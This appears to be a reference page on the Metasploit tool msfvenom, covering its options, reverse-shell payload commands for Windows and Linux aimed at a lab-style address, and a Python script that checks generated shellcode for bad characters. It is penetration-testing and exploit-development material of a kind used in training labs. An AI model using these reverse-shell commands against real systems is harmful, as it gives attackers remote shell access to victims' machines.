msfvenom is a command-line tool from the Metasploit Framework that generates payloads in many output formats (ELF, PE, raw shellcode, PowerShell, etc.) for binary exploitation, client-side attacks, and other purposes.

Usage

msfvenom <options...>

  • -p <payload> <options>: payload module plus its options, e.g. -p windows/shell_reverse_tcp LHOST=...
    • LHOST=<local ip>: address the reverse shell connects back to
    • LPORT=8888: port the reverse shell connects back to
    • EXITFUNC=thread: exit via the ExitThread method so only the hijacked thread terminates, not the whole process
  • -f <format>: payload output format, e.g. c or py for a source-styled string, exe or elf for a binary
  • -v <varname>: variable name used in the string output (e.g. the name of the Python variable holding the shellcode)
  • -e <encoder>: encoder applied to the payload, e.g. -e x86/shikata_ga_nai
  • -i <iters>: number of encoding iterations
  • -b <badchars>: bytes that must not appear in the output, e.g. -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
  • -x <embedfile>: existing executable used as a template to embed the payload into

Examples

Windows

This snippet is intended for a Windows buffer overflow in a threaded application that serves HTTP or TCP.

  • Change the LHOST IP address in the snippet
  • Start a listener / handler on port 8888

Set EXITFUNC on threaded servers/applications!

With EXITFUNC=thread the payload exits through ExitThread, so only the hijacked thread ends and the same service instance can be exploited again. Without it the whole process exits, so the service crashes after the first exploitation attempt.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Linux

This snippet generates generic Linux x86 reverse-shell shellcode, output as a Python byte string (e.g. for exploit development).

  • Change the LHOST IP address
  • Start a listener on port 8888

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 -b "\x00\x20" -f py -v shellcode
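The -b option only promises that the encoder avoided the listed bytes; before using output from either of the two snippets above it is worth verifying that claim independently, since a single missed bad character silently truncates or corrupts the payload in the target's input path. The following script is an added example written for this page, not part of msfvenom or Metasploit: it parses text in the shape of msfvenom's -f py -v shellcode output, reassembles the byte string, and reports the offset of every byte that appears in the -b list. The SAMPLE_PY_OUTPUT text is constructed filler (arbitrary bytes, not real shellcode) that deliberately contains a 0x0a byte so the check has something to flag.

```python
import re
import sys

# Constructed sample in the shape of `msfvenom -f py -v shellcode` output.
# The bytes are arbitrary filler for this demonstration, not shellcode;
# the 0x0a at offset 4 is included on purpose so the check reports a hit.
SAMPLE_PY_OUTPUT = r'''
shellcode =  b""
shellcode += b"\x90\x90\x31\xc0\x0a\x41"
shellcode += b"\x42\x43\x44\x45"
'''

# One b"..." literal made only of \xNN escapes, as msfvenom emits them.
BYTE_LITERAL_RE = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')
# A single \xNN escape inside such a literal (or inside a -b string).
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_badchars(spec: str) -> bytes:
    """Turn an msfvenom-style -b string such as "\\x00\\x0a" into bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE_RE.findall(spec))


def parse_py_output(text: str) -> bytes:
    """Reassemble the payload from `-f py` formatted text.

    Every `var += b"..."` line contributes its bytes in order; the empty
    `b""` on the first line contributes nothing.
    """
    out = bytearray()
    for literal in BYTE_LITERAL_RE.findall(text):
        out.extend(int(h, 16) for h in HEX_ESCAPE_RE.findall(literal))
    return bytes(out)


def find_badchars(payload: bytes, badchars: bytes) -> list:
    """Return (offset, byte) pairs for every payload byte in badchars."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check(text: str, badchar_spec: str) -> dict:
    """Parse `-f py` text and report length, hits and an overall verdict."""
    payload = parse_py_output(text)
    hits = find_badchars(payload, parse_badchars(badchar_spec))
    return {"length": len(payload), "hits": hits, "clean": not hits}


if __name__ == "__main__":
    # Usage: python badchar_check.py <badchars> [file-with-msfvenom-py-output]
    # With no file argument the constructed sample above is checked.
    spec = sys.argv[1] if len(sys.argv) > 1 else r"\x00\x0a"
    if len(sys.argv) > 2:
        with open(sys.argv[2], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_PY_OUTPUT
    result = check(text, spec)
    print(f"payload length: {result['length']} bytes")
    for offset, byte in result["hits"]:
        print(f"bad character 0x{byte:02x} at offset {offset}")
    print("clean" if result["clean"] else "NOT clean")
```

Run it against the saved output of the Linux snippet with the same -b string you passed to msfvenom (for example python badchar_check.py "\x00\x20" shellcode.py); a "NOT clean" verdict means the encoder could not honour the bad-character list and the payload should be regenerated with a different encoder or more iterations rather than used as-is.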